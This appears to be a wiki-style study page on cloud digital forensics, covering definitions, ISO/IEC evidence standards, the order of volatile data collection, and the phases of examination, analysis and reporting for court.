This page is currently queued for revision.
The application of scientific principles, technological practices, and derived and proven methods to reconstruct past cloud computing events through identification, collection, preservation, examination, interpretation, and reporting of digital evidence.
Digital forensics is generally considered the application of science to the identification, collection, examination, and analysis of data while preserving the integrity of the information and maintaining a strict chain of custody for the data.
Forensic science is generally defined as the application of science to the law.
Network forensics is defined as the capture, storage, and analysis of network events. The idea is to capture every packet of network traffic and make it available in a single searchable database so that the traffic can be examined and analyzed in detail.
The goal of the following standards is to promote best practices for the acquisition and investigation of digital evidence.
|ISO/IEC 27037||Guide for collecting, identifying, and preserving electronic evidence|
|ISO/IEC 27041||Guide for incident investigations|
|ISO/IEC 27042||Guide for digital evidence analysis|
|ISO/IEC 27043||Incident investigation principles and processes|
|ISO/IEC 27050||Overview and principles for eDiscovery|
Challenges with forensics:
- Control over data (trustworthiness)
- Data volatility
- Evidence acquisition
Access to data will be decided by the following:
- The service model
- The legal system in the country where data is legally stored
There are certain jurisdictions where forensic data/IT analysis requires licensure (Texas, Colorado, and Michigan, for example).
Identify and preserve evidence and begin chain of custody documentation.
Label, record, acquire evidence, and ensure that modification does not occur.
- Develop a plan to acquire the data; important factors for prioritization include:
- Likely value
- Amount of effort required
- Acquire the data
- Verify the integrity of the data
Network forensics has various use cases for data acquisition and collection:
- Uncovering proof of an attack
- Troubleshooting performance issues
- Monitoring activity for compliance with policies
- Sourcing data leaks
- Creating audit trails for business transactions
Prioritization Order for Volatile Data
- Network connections
- Login sessions
- Contents of memory
- Running processes
- Open files
- Network configuration
- Operating system time
Alternative Prioritization for Volatile Data
- CPU cache, registers, RAM
- Virtual memory
- Disk drives
- Backups and printouts
After data has been collected, the next phase is to examine the data, which involves assessing and extracting the relevant pieces of information from the collected data.
Yields data. Just the facts. For example:
- File opened at 10:23 AM
- DNS stopped at 7:02 AM
The analysis should include identifying people, places, items, and events and determining how these elements are related so that a conclusion can be reached.
Often, this effort includes correlating data among multiple sources. For instance, a NIDS log may link an event to a host, the host audit logs may link the event to a specific user account, and the host IDS log may indicate what actions that user performed.
How to identify who completed an event:
- Source address
- User identity (if authenticated or otherwise known)
- Service name and protocol
- Window, form, or page (such as URL address)
- Application address
- Application identifier
Information. Taking data and putting it into context. For example:
- DNS stopped at 7:02 AM but nobody should have had access to DNS at 7:02 AM...
The final phase is reporting, which is the process of preparing and presenting the information resulting from the analysis phase. Many factors affect reporting, including the following:
- Alternative explanations
- Audience consideration
- Actionable information
The ultimate recipient of all forensic evidentiary collection and analysis-the entity getting the reports-will be the court, in order to make a final determination of its merits and insights.
Document what was learned. Something is always learned.